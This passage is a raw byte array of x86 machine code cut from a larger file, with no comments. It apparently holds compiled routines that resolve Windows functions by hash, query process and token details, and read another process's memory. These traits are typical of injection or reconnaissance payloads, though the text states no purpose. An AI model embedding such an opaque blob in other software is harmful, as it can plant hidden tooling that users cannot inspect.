24,0xE8,0x7D,0x16,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x27,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0x58,0xF8,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x74,0x16,0x8B,0x55,0xE4,0x8B,0x45,0x0C,0x89,0x10,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xE5,0x13,0x00,0x00,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xD3,0x13,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x12,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0xBB,0x13,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xEC,0x68,0xE6,0x48,0x65,0xC7,0x45,0xF0,0x08,0xE7,0x48,0x65,0xC7,0x44,0x24,0x0C,0x02,0x00,0x00,0x00,0x8D,0x45,0xEC,0x89,0x44,0x24,0x08,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x44,0xE7,0x48,0x65,0xE8,0xF1,0xF6,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x18,0xC7,0x04,0x24,0x56,0xE7,0x48,0x65,0xE8,0x6C,0xBD,0xFF,0xFF,0xC7,0x04,0x24,0x05,0xE7,0x48,0x65,0xE8,0x60,0xBD,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x74,0xE7,0x48,0x65,0xE8,0xA2,0xF6,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x18,0xC7,0x04,0x24,0x88,0xE7,0x48,0x65,0xE8,0x1D,0xBD,0xFF,0xFF,0xC7,0x04,0x24,0x05,0xE7,0x48,0x65,0xE8,0x11,0xBD,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x44,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x08,0x00,0x00,0x00,0x8B,0x45,0xDC,0x89,0x45,0xEC,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0xF3,0xDB,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x7F,0xE4,0xDE,0xE9,0x89,0x04,0x24,0xE8,0x62,0xDA,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0x21,0x01,0x00,0x00,0x8B,0x45,0xDC,0x89,0x45,0xEC,0x8B,0x5D,0xDC,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xEE,0x00,0x00,0x00,0x8B,0x45,0xDC,0x8D,0x55,0xDC,0x89,0x54,0x24,0x10,0x89,0x44,0x24,0x0C,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x7C,0x14,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x79,0x59,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xEC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x0F,0x4E,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xE8,0x23,0x00,0x00,0xC0,0x0F,0x84,0x42,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xE8,0x00,0x78,0x60,0xC7,0x44,0x24,0x04,0x44,0x00,0x00,0x00,0xC7,0x04,0x24,0x40,0x00,0x00,0x00,0xA1,0x60,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x08,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x3C,0x8B,0x45,0xF0,0x8B,0x10,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x44,0x00,0x00,0x00,0x8B,0x45,0xE4,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x74,0x15,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x74,0x4A,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xDC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x42,0x4D,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x24,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x1B,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0xFD,0xD9,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x4F,0xB3,0x89,0x2E,0x89,0x04,0x24,0xE8,0x6C,0xD8,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x63,0x8D,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x93,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x41,0x8B,0x45,0xEC,0x8B,0x55,0x0C,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0x8B,0x45,0xF4,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xF0,0x8B,0x45,0xEC,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0x8D,0x45,0xEC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x36,0x10,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x72,0x8B,0x45,0xEC,0x8D,0x55,0xE8,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xFA,0xFE,0xFF,0xFF,0x89,0x45,0xF0,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xE5,0x0F,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3E,0x8B,0x45,0xE8,0xC7,0x44,0x24,0x04,0x44,0xE7,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x8B,0x45,0x08,0x89,0x10,0x8B,0x45,0xE8,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0x87,0xD8,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x4F,0xB3,0x89,0x2E,0x89,0x04,0x24,0xE8,0xF6,0xD6,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x5D,0x8D,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xF0,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x42,0x8D,0x45,0xE4,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,0x24,0x8B,0x45,0xF0,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x27,0x8B,0x55,0xE4,0x8B,0x45,0xE8,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xF4,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x10,0x8B,0x45,0xE8,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x10,0x8B,0x45,0xE4,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xE8,0x08,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF0,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF0,0x8B,0x5D,0xE8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF9,0x00,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0x89,0x44,0x24,0x0C,0x8B,0x45,0xF4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x0B,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x5C,0x10,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x59,0x83,0x7D,0xF4,0x00,0x74,0x44,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0xEF,0x49,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x23,0x00,0x00,0xC0,0x0F,0x84,0x3C,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x61,0x8B,0x45,0xF4,0x8B,0x00,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x8B,0x45,0x0C,0x89,0x10,0x83,0x7D,0xF4,0x00,0x74,0x44,0x8B,0x45,0xE8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x76,0x49,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x40,0x04,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x01,0x00,0x00,0x8D,0x95,0xE4,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x80,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8D,0x95,0xE4,0xFB,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x80,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8B,0x45,0xF0,0x89,0x85,0xE0,0xFB,0xFF,0xFF,0x8B,0x45,0xF0,0x89,0x85,0xDC,0xFB,0xFF,0xFF,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0x0C,0xD6,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x2B,0x75,0x3E,0x09,0x89,0x04,0x24,0xE8,0x7B,0xD4,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x1B,0x01,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA5,0xF9,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xFF,0x00,0x00,0x00,0x8B,0x45,0xE4,0x8D,0x95,0xD8,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x18,0x8D,0x95,0xDC,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x14,0x8D,0x95,0xE4,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x10,0x8D,0x95,0xE0,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x0C,0x8D,0x95,0xE4,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x1C,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xAD,0x00,0x00,0x00,0x8B,0x45,0xF0,0xC1,0xE0,0x02,0x8D,0x58,0x02,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x79,0x8B,0x45,0xF0,0x01,0xC0,0x8D,0x50,0x01,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x54,0x24,0x08,0x8D,0x95,0xE4,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x41,0x48,0x00,0x00,0x8B,0x45,0xF0,0x01,0xC0,0x8D,0x50,0x01,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0xAC,0xE7,0x48,0x65,0x89,0x04,0x24,0xE8,0x18,0x48,0x00,0x00,0x8B,0x45,0xF0,0x01,0xC0,0x8D,0x50,0x01,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x54,0x24,0x08,0x8D,0x95,0xE4,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xF5,0x47,0x00,0x00,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x10,0x8B,0x45,0xE4,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x8B,0x45,0xF4,0x8D,0x65,0xF8,0x5B,0x5F,0x5D,0xC3,0x90,0x55,0x89,0xE5,0x83,0xEC,0x48,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x18,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x61,0x0B,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xDC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x7E,0xFF,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF3,0x00,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x0C,0x89,0x45,0xF0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x8C,0x0A,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x10,0x83,0x7D,0x0C,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA1,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x79,0x4F,0x83,0x7D,0x0C,0x00,0x74,0x49,0x81,0x7D,0xEC,0x22,0x00,0x00,0xC0,0x75,0x1A,0xC7,0x04,0x24,0xB0,0xE7,0x48,0x65,0xE8,0x74,0xB4,0xFF,0xFF,0xC7,0x04,0x24,0xE3,0xE7,0x48,0x65,0xE8,0x68,0xB4,0xFF,0xFF,0xEB,0x1F,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xE8,0xE7,0x48,0x65,0xE8,0x53,0xB4,0xFF,0xFF,0xC7,0x04,0x24,0xE3,0xE7,0x48,0x65,0xE8,0x47,0xB4,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4C,0x8B,0x45,0xE4,0x83,0xC0,0x0C,0x89,0x45,0xE8,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE0,0x89,0x44,0x24,0x08,0x8B,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE5,0x09,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x20,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA3,0x00,0x00,0x00,0x8B,0x45,0xF4,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x8B,0x40,0x18,0xBA,0x00,0x00,0x00,0x00,0x8B,0x4D,0xF4,0x89,0x41,0x08,0x89,0x51,0x0C,0x8B,0x45,0x0C,0x8B,0x50,0x20,0x8B,0x45,0xF4,0x89,0x50,0x10,0x8B,0x45,0x0C,0x8B,0x50,0x44,0x8B,0x45,0xF4,0x89,0x90,0x18,0x02,0x00,0x00,0x8B,0x45,0x0C,0x8B,0x90,0xB0,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x90,0x1C,0x02,0x00,0x00,0x8B,0x45,0x0C,0x0F,0xB7,0x40,0x24,0xBA,0x00,0x02,0x00,0x00,0x66,0x39,0xD0,0x0F,0x47,0xC2,0x0F,0xB7,0xC0,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x8D,0x48,0x14,0x8B,0x45,0x0C,0x8B,0x40,0x28,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8B,0x55,0xF0,0x89,0x54,0x24,0x0C,0x89,0x4C,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x03,0x09,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0xB8,0x00,0x00,0x00,0x8B,0x45,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xBF,0x08,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x62,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x14,0x89,0x04,0x24,0xE8,0xA2,0x44,0x00,0x00,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x2C,0x0F,0xB7,0xD0,0x8B,0x45,0x10,0x8B,0x40,0x30,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x89,0x54,0x24,0x0C,0x8B,0x55,0x14,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x62,0x08,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x81,0xEC,0x08,0x03,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0x14,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x40,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x01,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xEA,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x34,0x01,0x00,0x00,0x8D,0x85,0x10,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x0C,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE9,0xFE,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x39,0x01,0x00,0x00,0x83,0x7D,0xEC,0x00,0x75,0x09,0x8B,0x85,0x1C,0xFF,0xFF,0xFF,0x89,0x45,0xEC,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0xC3,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0x8D,0x95,0x10,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x92,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x01,0xD0,0x8B,0x00,0xC7,0x44,0x24,0x04,0x0C,0xE8,0x48,0x65,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x07,0xC7,0x45,0xE4,0x01,0x00,0x00,0x00,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x69,0xFD,0xFF,0xFF,0x89,0x45,0xD4,0x83,0x7D,0xD4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9B,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x08,0x8B,0x45,0xD4,0x89,0x45,0xF4,0xEB,0x21,0x8B,0x45,0xF4,0x89,0x45,0xDC,0xEB,0x08,0x8B,0x45,0xDC,0x8B,0x00,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x8B,0x00,0x85,0xC0,0x75,0xEF,0x8B,0x45,0xDC,0x8B,0x55,0xD4,0x89,0x10,0x0F,0xB7,0x45,0xEA,0x83,0xC0,0x01,0x66,0x89,0x45,0xEA,0xEB,0x10,0x83,0x45,0xE0,0x01,0x8B,0x45,0xE0,0x3B,0x45,0x10,0x0F,0x8C,0x31,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x3B,0x45,0xEC,0x74,0x0F,0x0F,0xBF,0x45,0xEA,0x39,0x45,0x10,0x0F,0x8F,0xBF,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0x14,0x00,0x74,0x25,0x83,0